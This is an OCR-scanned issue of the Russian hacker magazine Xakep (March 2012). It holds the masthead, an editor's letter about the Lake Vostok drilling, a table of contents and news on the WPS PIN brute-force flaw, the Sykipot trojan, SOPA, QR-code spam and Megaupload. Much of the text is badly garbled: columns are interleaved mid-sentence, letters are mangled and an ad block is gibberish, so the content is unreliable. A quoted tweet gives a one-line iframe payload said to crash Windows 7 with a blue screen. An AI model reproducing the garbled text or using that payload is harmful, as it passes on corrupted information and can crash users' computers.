Issuu on Google+

Исчерпывающий гид по шоппингу в китайских интернет-магазинах


_.....

-пF.нЕР РЕДАКЦИЯ Главный редактор

Никита (<nikitozz)) Кислицин

Шеф-редактор

Степан ((step)) Ильин lstepfareal.xakep.ru ) Николай ((gorl)) Андреев [ gorlumrarea l. xakep . гu l

Выпускающий редактор

[nikitoziOreal.xakep ru )

Редакторы рубрик

PC_ZONE и UNITS

Степан ((step)) Ильин

взлом

РR-директор

Маг (maggiOreal.xakep.ru ) Андрей ((Andrushock» Матвеев landrushockiOreal.xakep.ru ] Александр «Dr. Кlouniz» Лозовский lalexanderlё!real.xakeo . ru] Николай <<gогi>>Андреев [gorlumffireal.xakep.ru J Анна Г риrорьева [grigorievafaglc.ru ]

Литературный редактор

Елена Болотникова

UNIXOIO и SYN/ACK MALWARE КОДИНГ

lstep@real.xakep.ru)

DVD Выпускающий редактор

Антон с<аnt>>Жуков

Uniх-раздел Security - paздeл

Андрей «Andrushock" Матвеев [andrushockffireal.xakep.ru ) Дмитрий «01g1 >>Евдокимов fevdokimovds@gmail.com)

Монтаж видео

Максим Трубицын

(antrareal xakep.ru ]

ART Арт-директор

Алик Вайнер 1~1

Дизайнер

Егор Пономарев

Верстальщик

Вера Светлых

Иллюстрация на обложке

Александр Брички н

PUBLISHING Учредитель

000 «Г ей м Лэнд>>, 115280, Москва, 5 этаж, офис N<> 21. Т ел.: (4951935-7034, факс: (4951545-0906

у л. Ленинская Слобода, 19, Омега nлаза,

ПРИВЕТ С АНТАРКТИДЫ

Генеральныйдиректор

Дмитрий Агарунов

Генеральный издатель

Андрей Михайлюк

Финансовый директор

Андрей Фатеркин

Директор по маркетингу

Елена Каркашадзе

Управляющий арт ·директор

Алик Вайнер

Главныйдизайнер

Энди Тернбулл

Директор по nроизводству

Сергей Кучерявый

РАЗМЕЩЕНИЕ РЕКЛАМЫ

Две недели назад получил особенное электронное письмо, которое меняпо-хорошемутронуло и заставило задуматься о вечном. Писал

Т ел.: (4951935-7034, факс: (4951545 -0906

РЕКЛАМНЫЙ ОТДЕЛ

СерегаСильнов-редактор рубрики «Фри кинг >>, который еще

Директор груnnы TECHNOLOGY

в прошлом годуотправился в научную экспедицию вднтактиду.

Старшие менеджеры

Письмо стало особенны м, потому что отправлено почти с южного полюса и передано по коротковолновой связи со скоростью бод через

-50 неком мерческую радиолюбительскую сеть Wl NLl NK.

В письме Сергей передавал приветы и рассказывал о своих впе­ чатлениях , которые в таком необычном месте рождаются от самых простых вещей.

Менеджер Директор корпоративной группы Старший менеджер Менеджер Старший трафик·менеджер

Марина Филатова (filatovaiOglc.гu l Ольга Емельянцева ( olgaemiiOglc . гu l Оксана Алехина falekhinaraglc.rul Елена Поликарпова ( polika r povalё!glc.ru ) [работа с рекламными агентствами] Кристина Т атаренкова [tatarenkovafOglc.ru ] Юлия Г ос подинова f gospoфnova fOglc . ru ] Мария Дубровская (dubгovskayaiOglc гu l Марья Буланова [ bulanovaГclglc:.ru )

ОТДЕЛРЕАЛИЭАЦИИСПЕЦПРОЕКТОВ

Впрочем, вся эта романтика была лишь сопутствующей вещью для

Директор

Александр Коренфельд l koгenfeldiOglc. гu l

Сергея, ведь он приехал туда в составе экспедиции, которая должна

Менеджеры

Светлана Мюллер Наталия Тулинова

была пробурить 3 768 метров льда и ответственно дотян уться до подледного озера Восток, не навредив ему. Озеро действитель­

РАСПРОСТРАНЕНИЕ

но огромное:

Директор по дистрибуции

Кошелева Татьяна

Руководитель отдела nодпис ки

Клепикова Виктория Oepikovalё!glc. ru )

250 километров

в длину, 50-в ширин у, и до 1.2-в

глубину. Учи тывая , что оно было изолировано от внешнего мира сотни тысяч лет, вопросы об обитающих в этом озере формах жизни и о том, что вообще там происходит, -ч ертовски интересны: до­ стоверно об этом человечеству ничего не известно . Не так уж много

осталось на планетенеизученных уголков,- и вот озеро Восток являетсяоднимиэтаких объектов.

Какова же была моя радость, когда сегодня [5 февраля) я прочел но­

[koshelevalaglc.ru l

Руководитель

Лукичева Наталья Hukichevafaglc.ru ]

спецрасnространен и я

Претензии и дополнительная ин фа: В случае возникновения вопросов по качеству печати и ОVО-дисков: claimlё!glc.ru . Горячая линия по подnиске

Факсдля отправки купонов и квитанций на новые подписки:

[495] 545-09-06

Телефон отдела подnискидля жителей Москвы: [495) 663-82-77 Т елефон для жителей регионов и для звонков с мобильных телефонов: 8-800-200-3-999

вость о том, что российская экспедиция достигла ус пе ха идоб урила

Дnя nисем:

эту скважину, реализовав проект, длившийся более

Зарегистрировано в Министерстве Российской Федерации по делам nечати, телерадиовещанию

30 лет! Чертов­

ски горд за Сергея и его коллег-российских ученых, работающих в этой экспедиции и решившихтакую сложную задачу! Выполняю

его просьбу: передаю привет всем читателям Х с Антарктиды : ).

101000, Москва, Главnочтамт, а/я 652, Хакер

и средствам массовых коммуникаций ПИЯ Отпечатано в тиnографии

77-11802

от 14.02.2002.

Scanweb, Финляндия. Т и раж 219 833 экземпляров.

Мнение редакции не обязательно совпадаете мнением авторов. Все материалы в номере

P.S.

Сергей обещал сделать фотографию с вытоптанным в снегу

на фоне полярной станции логотипом Хакера. Ждем его возвра­

щения:).

предоставляются как информация к размышлению. Лица, использующиеданную информацию в nротивозаконных целях, могут быть nривлечены к ответственности. Редакция не несет ответ­ ственности за содержание рекламных объявлений в номере.За nереnечатку наших материалов без спроса- nреследуем.

По воnросам лицензирования и nолучения nрав на использование редакционных материалов

nikitozz, rn. ре д. Х shop.glc.ru/xakep vkontakte.ru/xakep mag

ХАКЕР

03/158/2012

журнала обращайтесь по адресу: contentragtc.ru .

© 000 «ГеймЛзнд», РФ, 2012

001


Content MEGANEWS

016

Колонка Степы Ильинна

017

Proof-of-concept

О хранении паралей

Все новое за последний месяц

011

hacker tweets Хак-сценавтви ттер е

РЕГУЛЯРНО ПОЛЬЗУЮТСЯ

008

HEADER 004

1АМИЛЛИНОВАМЕРИКАНЦЕВ

ТЕХНОЛОГИЕЙ ОR-КОДОВ

За дач а: собрать интересные данные с PasteЬin . com

COVERSTORY

030

Большая охота Интервью с ведущим хед­ хантером рунета

COVERSTORY

COVERSTORY

018

02,

Ломаем Wi-Fi

Расщепляй и

за

властвуй

10 часов Получаем WPAключ для Wi-Fi с

Уязвимости рас-

помощью уязви-

са и внедрения

мой технологии

заголовков в со-

WPS

временном вебе

щепления за про-


048

038

PCZONE

-

UNIXOID

В Китай за покупками?

104

Свободачерезизоляцию

108

Федоринасча ст ье

Из чего состоят безопасные Liпuх - дистрибутивы

Семь китайских интернет-магазинов со всякой всячиной

042

Проверка на прочность

Мини-обзор заслуживаю щ их внимания изме н е н ий

Тестируем универсальную распознавалку САР Т СНА

048

Фреймворкдля пентестера

в последних версиях F edoгa

Тестируем безопасность веб-приложения с помощью

11 О

wЗaf

052

Интегрируем Liпux и <<облачные» сервисы

взлом

-

SYN/ACK

Easy-Hack

114

В поискахинсайдера

120

Корпоративныесвязи

Борьба с утечками корпоративной информа ц ии

Хакерекие секреты простых вещей

056

Достучаться до небес

Обзорэксплоитов

Анализ свеженькихуязвимсетей

Опенсорсные решения для централизованного

062

РНР - бот для

управления доступом к ресурсам

066

1сап сгасk it!

Создаем высокопроизводительный сайт

Решение заданий для хак-конкурса, учрежденного

с использованием

Windows

Кодим бота для распределенных вычислений

124

Испытаниенагрузкой

nginx и Django

Управлением правительстве н ной связи

Великобритании

070

Фальшивые

SMS: похудей за 30 дней!

Всяподного т ная известноголохетро н а

074

X-Too ls

-

FERRUM

130

От <<винта » ! Тестирование внешних жесткихдисков с

Программы для взлома

136

Ed i f i eг

WEXLER.BOOKТ7055

USB 3.0

R2500

Обзор универсальной активной стереосистемы

-

MALWARE

138

076

Веселая тройкабуткитов

-

И шве ц , и жнец, и на дуде игрец с ц ве т ным

Самыетехнологичные угрозы

2011

года

в веселых картинках

082

Малварьдля мобильных << окошек »

Исследуем модель безопасности п опулярной ОС д лясмартфоновнапрактике

КОДИНГ 088

Формграббердля

FAQUNIТED

143

Диско

144

8.5 Гб всякой WWW2

Google Chгome

Расширяем возможности препроцессора С/С++ с помощ ь ю сторо н него кодегенератора

096

3адачинасобеседованиях П одборкаинтересныхзаданий,которыедают на собеседованиях

100

Паттерны проектирования <<Адаптер» и «Фасад» Меняем и н терфейсы классов без ущерба для з д оровья

Большой

FAQ всячины

Удобные wеЬ-сервисы

и способ их перехвата в браузе ре от Google И целого Си мало

юниты

140

Исследуем отправку зашифрованных форм

094

сенсор н ым дисплеем

110

2.0


MEGANEWS НОВАЯ ДЫРКА В WPS ОБЛЕГЧАЕТЗАДАЧУХАКЕРАМ БРУТФОРСИМ ЛЕГКО И БЫСТРО

GOOGLE ОБВИНЯЮТ В НАРУШЕНИИ ШЕСТИ ПАТЕНТОВ. Истцом выстуnает Bг i t i sh

Telecom -одна из круnне й ших в мире телекоммуникационных комnаний.

ТРОЯ Н ОХОТИТСЯ НА С МАРТ-КАРТЫ ВОЕННЫХ МАЛВАРЬ, ИСПОЛЬЗОВАВШАЯСЯ ДЛЯ АРТ -АТАК,

н

еприя т нуюуязвимостьна­

шел в с т андарте

СМЕНИЛА ПРОФИЛЬ

WPS [Wi- Fi

Pгotected Setupl исследо­

ватель в области информационной безопасности Стефан В и бок, о чем и поспе ш и л уве д омить U S-CERТ. Д ырка присутствует в продуктах мно­ гих популярных брендов, в том числе

0-Link, Netgeaг, Linksys и Buffalo. Она позволяет ощутимо сократить время,

уходящее на брутфорс РIN-кода, который необходим для установки беспроводного роутера. В результате о ш ибки к атакующему возвращается слишком много информации о РIN­ коде, а сам он становится слабее, что не г ативно влияет на защиту

тысяч, если не миллионов

Wi-Fi-

ма ршр у т изаторов и точек дост упа.

В

а

US-C ERT поясняют: «Если

nроверка

D

троянце

Sykipot, казалось бы,

нет ничего особен­

ного- малварь, ориен т ирова нн ая на п охищение

данных о смарт-картах, не нова . Но не каждый

деньувидишь малварь, цель которой - смарт-карты

сотрудников Министерства обороны С Ш А и п олучение с их помо щ ьюнесанкционированного д оступа к о г ра­

ниченным ресурсам. Именно т акие модификации в коде

по д линности РIN-кода завершилась

Sykipot обнаружили специалисты

неуда ч но, точка доступа посылает

Одна из новых функций троянца обеспечи в ает вз��имо­

сообще н ие

действие с ПО

EA P-NACK н азад клиенту.

компании

Activ ldentity ActivC ii ent,

AlienVault.

к от орое как раз

Эти сообщения пересылают ся таким

работает со смарт-картами, соо т ветс т вующими ста н дар­

образом,чтохакеруудаетсяопреде­

там безопаснос т и Минобороны С Ш А. В американском

лить, является ли первая половина

Минобороны такие карточки использую т ся для хранения

РI N - ко д а в ер н ой. Пос л едняя цифра

цифровых сертификатов рабо т ников и их РI N-ко д о в , nри­

Отметим, что ни один

уже известна, так как она являет-

ме н яемыхдля аутентификации. В резул ьт атетехнического

из производителей,

ся кон т рольной суммой РIN-кода.

анализа специалистам

В се это зна ч ительно сокращает

новый вариант кода скомпи л ирован е щ е в марте

мости, не выпустил

количес т во п опыток, требуемыхдля

но он до сих пор был не слишком широко распространен.

ее исправление .

усnеш н ого брутфорса: о н о снижается

Он способен перехватыватьданные о сер т ификатах и п ри

продукты которых подвержены уязви­

В своей статье Вибок пишет, что лучшим

с

способом борьбы

сяч>>. По д робнее об этом ты можешь

димых РIN-кодах. После перехвата

п рочи т ать в одной из статей рубрики

краденую информацию н а защищенные р есурсы в Китае.

с дыркой на данный моментявляется

отключениеWРS .

10'8 д о 10'3 + 10'4, то есть до 11 ты­

AlienVault удалось в ыяснить, что 2011 года,

Соvе г Stогуэтого н омера.

помощи в строенного кейло г гера снимать дан н ые о в в о­

Sykipot переправляет

Э т о, в п рочем, н е говорит о т ом, что по л у ч атели да н ных тоже находятся в КНР.

@wЗ bdЗvil

<iframe height='18082563'></i causes а BSoD on \vi.n 7 х64 via

Lol!

Yota КОМПАНИЯ <<СКАРТЕЛ>>

ПОРТЫ СТАНДАРТАUSВЗ.О

ПРОИЗВОДИТЕЛЬ LINUX-

СКОРО, наконец, nоявятся

ДИСТРИБУТИВАМАNDRIVА,

WINDOWSPHONE MARKETPLACE nерешагнул

KOMAHДAIPHONE DEV-ТЕАМ,

(БРЕНД УОТА) ЗАПУСТИЛА В НОВОСИБИРСКЕ nервую

на смартфонах и nланше-

контролируемый российским

отметкув50тысячnри-

джейлбрейк nод iOS 5.01 для

сеть

LTE в России . Сейчас

тах.ПоинформациисСЕS,

фондом

ложений. На это магазину

iPhone45 и iPad 2. За nервые

сеть включает6З базовые

nроизойдет это в конце 2012-

объявить о банкротстве.

nонадобилось14месяцев

тридняутилитускачало

станции, но к марту их уже

го или в начале 2013 года.

Увы, дела у комnании совсем

(Andгoid Maгket в свое время

более одного миллиона

nлохи .

nотребовалось 19).

человек .

станет150.

001,

NGI, скоро может

наконец-то, выnустила

ХАКЕР

03 /158/ 2012


...;;; N

N

..; ш

u u

~

1-

=il

:J: а..

о

LO

u :..: < :!Е

х

LO

:!Е L-

:J: ш

:..: :s: а..

LO

~

:J: ш

11ш

а..

~ :s: u

< :!Е ~ :!Е

ш ш а..

:!Е

ш

а а..

1:J:

о

:..:

g 1:: о

:J: ш

с:

111

о

1-

е

. м

:s:

Реклама . Товар произведен в соответствии с Техническим Регламентом на табачную продукцию.

~~dдr~~~~~r~d~~т~~ r~~~~~ ~rrд~~rrжд~rт:

~ ~rt~~t ~rtд~т ~~шtм~ dд~r~~ью


MEGANEWS

23% МИРОВОГО ОБЪЕМА ВЫПУСКА ФЛЭШ-ПАМЯТИ NAND скупила в четвертом квартале прошлого года Apple.

ПЛАНШЕТ, ПРИСТАВКА ИЛИ ЧТО-ТО ДРУГОЕ? СМЕЛЫЙ КОНЦЕПТ ОТ RAZER

nредварительно озвученыследую­ щиетехнические ха­

рактеристики : экран

размером 10,1дюйма

и разрешением 1280 х 800 пикселей , много­ канальнаязвуковая

подсистема Dolby

7.11п роектируемая вместесТНХI. сред­ ства беспроводного подключения

Wi-Fi802.11b/g/n и Bluetooth 3.0. Планиру ется также

РАССМОТРЕНИЕSОРА И РIРАОТЛОЖЕНО О МАСШТАБНОЙ ОНЛАЙНОВОЙ АКЦИИ ПРОТЕСТА И ЕЕ РЕЗУЛЬТАТАХ

m

ы уже рассказывали о «чудесны х» американских

зако н о nр оектах SOPA IStop Online Р iгасу Act] и

PIPA IPROTECT lntellectual Р горегtу Act], nородивших

волну негодования не только на Заnаде, но по всем у миру. Для

тех. ктоумудрился все про nустить. напоминаем: зако нопро ­

екты обязывают всех у ч астни ков се ти интернет lпровай деры, хос тинги , п оиско вы е с и с темы и пр.] по первомутребованию правообладателя !без решения суда] удалять пиратский контент и прекращатьлюбые вза имоотно шения с nират­

использоватьаксе­

екими сер в исам и. Платежные системы обязаны отключить

лерометры и сенсор­

в озможность перев ода д е н е г, поисковики -удалить ссылки

ный экран .

на сайты и т. д . В случае невыполнения эт ихтребований ты считаешься соучастником и твой сайт могуттакже закрыть без суда и следствия. Кстати, иностранные сайты, сервера

которых расположены в США. будут нести такую же ответ­ ственность за нелегальный контент, как если бы они бы ли учреждены в Штат ах. Б олее подробно с законо nроектами и их возможными последствиями можно ознакомиться хо тя

бы в В икипедии, а нас сей час больше интересуют n осле д ­ ствия. П оняв, что «СО ПАблизка », крупные американские

корnорации ощу т или угрозу для себя любимых . За дра ко­ новские меры выступили, к пример у, М РАА, RIAA и альянс BSA !членами которого являются Microsoft, Apple, Adobe, lпt el и т. д.]. Зато против выеказались Google. Twitteг, Mozi lla, Facebook, Yahoo, еВ ау и дру гие представители интернет­

в

м ериканекая компания Rаzегхорошо известна во всем мире !в том чис­

индустрии. Чем ближе становился « деньХ », на который было

ле и в России] как производитель периферийных игровых устройств

запланированор ас смотре ние зако нопроектов в Конгресс~

и принадлежностей. И нужно заметить, хороших- пока я п ишу эту но­

тем больше накаляли с ь с тра сти. В осемна дцат ого января

вость, моя рука как раз лежит на мышке от былоувидеть

Project Fiоnа-проект,

Razer. Тем

интереснее и неожиданнее

над которым в комnании работаютсейчас

и который был nредставлен на выставке

CES 2012.

Эта концеnция nредставляет

в интернете прошла, пожалуй, самая массовая онлайновая акция протеста за все время его су ществования. Англоя­ зычная Википедия nровела самый масштабный в истории

собой игровой nланшет, ориентированный на игры, на иболее nоnулярные сей­

опрос, nодавляющее большинство участников ко то рого

час на ПК. то есть на игры <<nрожорливые>> и мощ ные . Ус т ройство nланируется

поддержало отключение англоязычного раздела на су тки

оснастить «интуитивными элементами уnравления» !кнопками и аналоговыми

в знак протеста.

джойстиками] с силовой обратной связью. Где именно и как они будут расnоло ­

свойлоготип черным прямоугольником цензуры . Поддержа­

жены, хорошо видно на иллюстрации. А гла вн ое, основой Pгoject

ли протести в WoгdPгess. В целом к акции протеста Ыackout

стать nроцессор lпtel Соге

примкнулитысячи сайтов по всему миру. Н еспадко пришло сь

с нехваткой игр для планшета- идея заключается в том, что практически все

и сторонникам SOPA. Та к. крупнейший в мире регистратор GoDaddy, nоддерживавший SOPA, подвергся жес т комубой­

Fi ona должен i7 третьего поколения. Заявлено, что по этому вопро­ су компания тесно сотрудничаете lntel. Этот ходдолжен устрани т ь проблему

Reddit приостановил работу. Google прикрыл

существующие игры смогут работать на устройстве без какой-либо nеределки

котуса сторо ны интернет-сообщества: пользователи приня­

или доработки. Ты скаже ш ь. чт о этотолько концепт. и будешь не прав. Специа­

ли сь тысячами у водить с вои домены от GoDaddy. Регистратор

листы Rаzегпочти готовы показать работающие образцы. Предполагается, что

оцени л ситуацию и поспешил отказатьс я отсвоих слов,

поставки устройства начнутся уже в четвертом квартале текущего года. Стоить

но по зже в интервью TechCrunch выя с нил ось. что

планшет должен не более $1000.

nо-nрежнему поддерживаетSОРА ... В общем , отт ок дом е нов

GoDadd y

продол жается и сейчас. Сдался nоддавлением народного негодования и альянс

ВЗЛОМАН КРУПНЕЙШИЙ ОБУВНОЙ ИНТЕРНЕТ-МАГАЗИН В США.

BSA, заявивший , что SOPA «требует доработки ». П отом, уловив тенденцию. «пере д ум али » и сенаторы, ратовавшие

за а нт ипиратские законоnроекты. В осем ь американских

законо дате л ейотк а за лись п оддерживать SOPA nосле

18

ZAPPOS.COM УВЕДОМИЛ 2' МЛН

января и Ыackout'a, некоторые и вовсе встали на сторону

КЛИЕНТОВ О ТОМ, ЧТО БД МА­ ГАЗИНА ВЗЛОМАНА И ИНФОР­ МАЦИЯ О НИХ МОГЛА ПОПАСТЬ В РУКИ ХАКЕРОВ

начально nр е дставивший законоnроектSО РА . отозвал его,

006

протестующих. И что в и т оге? Конгрессмен Ламар Смит, из­ при знав, что в нынешнем виде закон не можетбыть принят.

Рассмотрение зако н оnроек та было отложено.

PIPA nо­

сти гла та же участь. Можно ли на з вать это nобедой ? Вряд ли. Л оббисты и копирасты рассержены, н о останав лива ться они несобираются,полагая,чтосенаторов«затерроризировала бло г осфера». Теперьлоббист ы намере ны немного nересмо­

треть n о д ход к пробл еме. Звучит зловеще.

ХАКЕР

03/158/2012


7 ФИШЕК

BUFFALO CLOUDSTATION Собственный облачный сервер Buffalo CloudStation- это не NAS. Хранилище

традиционный

Удобный бэкап Традиционно для решений

nросто

nозволяет

легко организовывать удаленный дост уn к

данным через интернет nрактически с любых

Производительная

устройств: как со стационарного комnьютера,

конфигурация

так и с мобильных девайсов.

Buffalo

бэкаn данных с клиентских машин

Несмотря на комnактные размеры

орагниэовывается очень nросто. При

[15Dx175x45 ммl , сетевое хранилище

этом nоддерживается как так и МАС

05.

Windows,

оснащено довольно nрои зводитель­

Ус тро йство nоль-

ным же л езом, которое nозволяет не

ностью совместимо с эnnловской технологией

только организовать быстрый сете­ вой достуn к файлам, но и реализо-

Time Machine.

вать другие nолезные функции.

Встроенный

Припожения дпя

BitTorrent-клиeнт

iOS и Android Приложение

Webaccess

Как и большинство современных NAS'oв,

соз­

Buffa lo

оснащен встро­

дано для удаленного дост у nа

CloudStation

с мобильных ус тр ойств к дан­

ен ным ВitТоггеnt-клиентом с

ным, хранящИмся на решениях

удобным wеЬ-интерфейсом.

фирмы

Эту функцию по дос��оинству

Bu ffalo.

Одновременно

nоддерживается несколько

оценят любители интенсивно­

хра нилищ, а само nриложение

го р2р-обмена: качать торрен­

умее т работать с файлами в сех nоnулярных форматов: от ви­ део, фотографий и музыки до раз ноформатны х д окументов.

ты станет в разы удобней.

Перекодировка

Большой объем

медиафайлов

и энергоэффективность

Bu ffalo CloudStation

умеет авто -

матически кодировать весь виде­ оконтент в нужном размере nри

удаленном достуnе с мобильных устройств. Та ким образом, можно удобно смотреть, наnример, видео на айфоне, не задумываясь

о nерекодировке файлов.

Устройство nозволяет разместить в себе один диск от

1 до 2 Тб.

SATA-11

объемом

Среднее энерго­

n отребление nри этом не буде т nревышать

26

Вт. При текущих

расценках на э лектроэнергию , в

год это nозволяет экономить до

4

тысяч рублей, если сравнивать с обычным ПК .

ХАКЕР

03/158/2012

007


MEGANEWS

ИНДОНЕЗИЙСКИЙ ХАКЕР HMEI7 дефейснул сразу шесть доменов верхнего уровня , принадлежащих компании S i emeпs.

QR-КОДЫ МОГУТ БЫТЬ ОПАСНЫ

MEGAUPLOAD

КИБЕРПРЕСТУПНИКАМ ТОЖЕ НРАВЯТСЯ НОВЫЕ ТЕХНОЛОГИИ

ФБРЗАКРЫЛООДИН ИЗ КРУПНЕЙШИХ ФАЙЛООБМЕННИКОВ

о

ВСЕ

пасный прецедент создан в С Ш А-ФБР закрыло

один из крупнейших Файлаобменников в сети

Megaupload, генерировавший, no его собствен­ 4% всего интернет-трафика. Похоже

ным данным, около

n

на заголовок <<желтой>> новости , но, увы, это реальность.

рактически все интересныетехнологические новинки рано или поздно оказываются «на служ­

По запросу американских спецслужб в Н овой Зеландии

бе» у криминала. Н е избежали этой участи и

также были арестованы основатель nроекта Ким

QR-

продаж смартфонов , планшетов и других мобильных

ное заключение

девайсов.

чество,

Специалисты

Dotcom

Шмитц и еще три человека. Каждому из них грозиттюрем­

коды,популярностькоторыхрастетвместесувеличением

Websense ThгeatSeekeг Netwoгk об­

no трем обвинениям: 20 лет за мошенни­ 20 лет за отмывание денег и по пять лет за каждый

случай нарушения копирайта! Помимо этого, выдвинуты

обвинения nротив трех граждан других стран. Эти люди

наружили сп а м-сообщения, ссылающиеся на страницы со вс т роенными QR-кодам и. П о всей в идимости, так с па­

имели отношение к проектам компании. П о мнению

меры обходят спам-фильтры и пытаются заставить nоль­

Де n артамента юстиции С Ш А,

зователей открывать ссылки именно с помощью мобиль­

распространению пиратского контента . За пять лет рабо­

ных устройств. Сп а м выглядит как традиционная реклама

ты он якобы нанес индустрии развлечений ущерб в раз­

фар мы и содержитссылку на сайт 2tag .nl -

мере $500 млн в виде недоnолученной прибыли . Кроме

в полне легаль­

ный сервис, позволяющий создавать QR - ко д ы для

того, файлаобменник породил <<криминальные денежные

URL-

потоки>> !от рекламы и продажи премиум-аккаунтовl насумму$175м л н.

aдpecoв. Как только пользователь перехо д и т п о ссылке,

на экране отображается QR-код, а сnрава от него - адрес. Когда nользователь считывает QR-код, его устройство либо автоматически nереходит no зашифрованному адре­

су, либо сnрашиваету юзера разрешение lв зависимости от версии QR-читалкиl . Эту особенность ле г ко можно ис­ пользовать для распространения специфич н ой малвари

через уязвимостивмобильных браузерах : ведь обы ч но эти коды сканируют именно с помощью смартфонов . Увы, этот «виток эволюции>> в атаках на мобильные девайсы предсказывали многие аналитики.

Megaupload сnособствовал

а

Уже nоследовала реакция других ресурсов с аналогич­

Поданным к омпа­ ни ис оm5соге , 14 м лн амери к анцев

в возрасте от

18

ным функционалом : к nримеру, известный хостинг-сервис

FileSonic объявил о полном

отключении файлаобменного

до З4л е тр е гулярно

функцианала !составляющего, заметим, его суть) : теперь

используют

скачивать контент, загруженный другими nользователя­

свои мобильные

у с т ро й ства дл я чтен и я QR -к одов . А ведь ещ е недавно QR- к оды были по­ пулярн ы в осно вн о м

н а Восто ке.

ми, невозможно.

Отреагировала и «сетевая оппозиция>>-Апоnуmоus атаковали сайты ФБР, Минюста США , Белого дома,

RIAA,

М РАА и ресурсы прочих организаций, из-за действий которых был закрыт файлаобменный сервис.

THUNDERBOLTтм

оов

ИНТЕРФЕЙСТНUNDЕRВОLТСКОРОДОБЕРЕТСЯДОПК

РЯДНЕБОЛЬШИХКОММЕРЧЕ­

ANDROIDINVASIONCOCCЫЛKOЙ

HAБAЗEWINDOWS. Этy радостную весть сообщаетнам

СКИХ IPV6-CETEЙ пла ниру­

НАПРОГРАММИСТАGООGLЕСО­

издание DigiTime. По информации источника (данные о ко­

ется развернуть в Китае

ОБЩАЕТ, что Googl e в с кором

тором не раскрываются) , ряд << железных » гигантов, таких

к концу201 3 года. А уже

будущем м ожет начать вы ­

какSопу, Asus, Gigabyte Technologyи ASRock, уже активно

в

пуск м обильны х n р оце с сорав

внедряетТhundегЬоlt в свои nродукты. Новое железо

в Поднебесной стандартным

nод с обственнымтов а рны м

должно добраться до рынка в апрелетекущего года .

nрото к олом .

з нако м.

2015 году 1Рv6должен стать

ХА КЕ Р

03 / 158/2012


итоги

IGRDUPiB

КОНКУРСА НАСТАЛО ВРЕМЯ ПОДВЕДЕНИЯ ИТОГОВ НАШЕГО КОНКУРСА, КОТОРЫЙ МЫ ПРОВОДИЛИ СОВМЕСТНО С КОМПАНИЕЙ GROUP-IB, СПЕЦИАЛИЭИРУЮЩЕЙСЯ НА РАССЛЕДОВАНИИ ИНЦИДЕНТОВ ИНФОРМАЦИОННОЙ БЕЗОПАСНОСТИ. Напомним, в рамках соревнования было необходимо провести расследование сразу двух !Т-инцидентов: утечки конфиденциальных данных на предприятии, а так же взлома сервера на базе Liпux.

Победителями конкурса являются [в алфавитном порядке):

КОНСТАНТИН ИЛЬИН

~Еонид WАнин

ст дент 5 курса Физико-технического

Род занятий:

У

института

НТУУ "Киевский политех-

нический институт", Киев.

Комментарии nобедитеnя:

«Конку рс понравился, провед

е н на высоком техниче­

шил после знакомства

с ком ~ровне. Прдинятdь уч~~:~и~~сь хорошее впечатле­ с фреимворком

па пе,

ние о квалификации организаторов».

К сожале нию, обе щанный приз [трудоустройство в

Отчеты победителей

Group-IBI не подошел ни одному из победителей:

опубликованы на нашем сайте:

Константин учится в Киеве и пока не может переехать

www. xakep.ru/post/58241 1

в Москву, а Леонида полностью ус траивает и текущее место работы . Тем не менее, чтобы все было честно, мы

награждаем победителей ценными призами: каждый получает по

iPad 2 Wi-Fi

ЗG

16Gb.

Будь с нами! Стань одним из нас!


MEGANEWS

FАСЕВООКВЫПУСТИЛ СО6СТВЕННЫЙ МЕССЕДЖЕР для Windows, а ВКонтактетем временем те с тируетсерв и с видеозвонков

ДВАДЦАТЬ СЕМЬ СТЕКЛЯННЫХДЮЙМОВ НОВИНКА ОТ SAMSUNG НА РLS·МАТРИЦЕ

н

а прошед ш ей не д авно в Лас-Вегасе выставке

СЕ5

2012 свои

последние разработки продемон ­

стрировали топо в ые производители <<железа»

со всего мира. Интересного на СЕ5было много, но пере­ числить все мы, к сожалению, не имеем возможности, так

что придется ограничиться малы м. Одной из самых ярких новинок, пре д ставлен н ых на выставке, стал мони т ор

527В970 о т компании 5amsuпg, продолжающий 9-ю премиум - серию. Этот 27-дюймовый агрегат интересен

тем , что он работает на основе технологии PL5 IPiaпe L iпe 5witchingl. П о сути, это аналог IP5 lln-Piane 5witchingl oт5amsung . Так как I Р5-матрицы на данный момент являются <<вершиной пищевой цепи», эта старая-новая т ехноло г ия заи н тересовала многих.

П ервый блин

y5amsung,

однако, вышел комом: два мо­

нитора на РL5-матрице, представленные в прошлом году, обладали букетом всех возможныхдефектов сборки, были помещены в корпус из д овольнодешевого пластика и в

результа т е имели засве т ы, битые пиксели и т. п. П охоже, тепер ь 5amsuпg решил а ис пр авить э т от промах.

Мо д ель 527 В 970 выпо л нена в соли д ном и одновре­ менно с в ерхтонком корпусе, а все элементы управления

помещены в эргономичную алюминиевую подставку !там же нахо д ятся порты ввода - вывода и U 5 В -концентраторl , регулируемую по высоте. Д иапазон регулирования монитора 9-й серии по высо т е составляет

10 см,

плюс его

можно н а клонять. П а н ел ь имеет ультравысокую четкость

QHD 12560 х 14401, поддерживаеттехнологии Display P oгt, Dual L iпk - DVI и Н DMI, а также оснащена стереодинамика ­ ми мощностью 7 Вт и интерфейсом MoЬile High Defiпition Link IM HLI д ля п одключения смартфонов и планшетных П К. Устройство п о дд ерживает эксклюзивную технологию

5amsung

Nat uг al Соlог Е х р ег t , к в озмож н ост я м которой

относитс я аппаратная ка л ибровка цветов. 527 В 970

же <<эффект мокрой тряпки >> !, который часто проявляе т ся

способен отображать более миллиарда оттенков, что

дажеутоповых современных дисплеев. Так как <<кристал­

гарантирует высокий реализм и качество при отображе­

лический эффект>> напрямую обусловлен матовостью па­

нии фотографий и ви д еороликов, сделанных с помощью

нели, у глянцевых мониторов он фактически отсутствует.

цифровой фо т о- или видеокамеры. Кстати, пресс-релиз

Здесь стоит заметить, что и первые образцы на базе

обещае т, что инже н еры 5amsuпg вруч н ую будут на­

вызвали немалое оживление утех, для кого прежде всего

страи в ать ц ветопере д ачу к аждого монитора серии

9

PL5

Яр кость: 300 кд/м 2 Равномерность )мин .): 90% К он т растность (статичес к ая) :

1000:1 Время отклика

(GTG): 5 м с Угол обзора (гор/верт.) : 178°/1 78°

в аж н о комфорт н ое для глаз изображение, все по той же

на окончательном этапе сборки. Кроме то г о , вся площадь

причине : РL5 - дисплеи с матовым экраном практически

дисплея также снабжена антибликовым стеклянным 111

не проявляли <<кристаллическо г о эффекта>>.

покрытием. Да-да, с т арое доброе стекло с антибликом,

Р а зрешение : 2560х 1440 Глуб ин а цвета : 1,07 млн цветов

Ожидается, что новинка поступит в продажууже в мар­

давненько мы такого не видели. Этот последний нюанс

те текущего года lк сожалению, неизвестно, появится ли

